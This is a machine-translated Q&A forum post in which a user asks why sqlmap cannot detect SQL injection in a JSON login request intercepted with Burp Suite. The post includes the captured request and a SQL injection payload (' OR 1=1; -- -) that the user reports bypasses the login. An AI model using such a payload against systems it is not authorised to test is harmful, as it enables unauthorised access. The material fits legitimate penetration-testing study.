Привет Я пытаюсь выполнить SQL-инъекцию в форме входа.SQLMAP - Опубликовать данные JSON как тело
С BurpSuite перехватывать запрос:
POST /xxxx/web/Login HTTP/1.1
Host: 10.0.0.70:42020
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://xxxxxx.com/xxxxxx/
Content-Length: 44
origin: http://xxxxx.com
Connection: close
{"username”:"user",”password”:"pass"}
с помощью:
sqlmap -u requestFile
(где requestFile является содержание запроса перехваченного с Burp)
sqlmap не могу найти поле для инъекций - пароль.
Я уверен, что это инъекционная причина, если в качестве пароля Я ввод:
' OR 1=1; -- -
Я могу войти с каждым именем вставить
Пробовал также с:
{"username”:*,”password”:*}
, но нет удачи.
Что я делаю неправильно?
Этот вопрос может быть лучше подходит для http://security.stackexchange.com/, но так как это своего рода Middleground я не голосования, чтобы закрыть Вот. Тем не менее, вы, вероятно, получите больше ответов. –
ОК опубликовано также в [security.stackexchange.com] (http://security.stackexchange.com/) – ronIDX